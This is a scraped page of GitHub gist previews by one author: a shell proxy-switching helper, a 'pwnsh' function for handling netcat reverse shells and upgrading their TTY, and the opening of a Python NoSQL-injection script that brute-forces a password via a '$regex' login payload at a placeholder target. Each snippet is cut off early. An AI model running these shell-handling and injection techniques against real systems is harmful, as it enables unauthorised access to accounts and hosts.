This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | # Date: 2025-01-31 | |
| # Author: Esonhugh | |
| # proxy command to make you switch your commandline fastly | |
| export PROXY_HOST="127.0.0.1" # define as your favour | |
| export PROXY_PORT="7890" # define as your favour | |
| proxys(){ | |
| case "$1" in | |
| (h) | |
| echo "|==============================================|" | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | function pwnsh(){ | |
| case "$1" in | |
| nc) | |
| rlwrap $* | |
| ;; | |
| tty) | |
| stty -raw echo;fg | |
| ;; | |
| re) | 
  
    
      This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
      Learn more about bidirectional Unicode characters
    
  
  
    
  | #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| import sys, requests | |
| target = "http://<target>/login.php" | |
| post_form = 'user=admin&pass[$regex]={}&remember=on' | |
| post_form = post_form.replace("admin","pedro") | |
| header = { | 
NewerOlder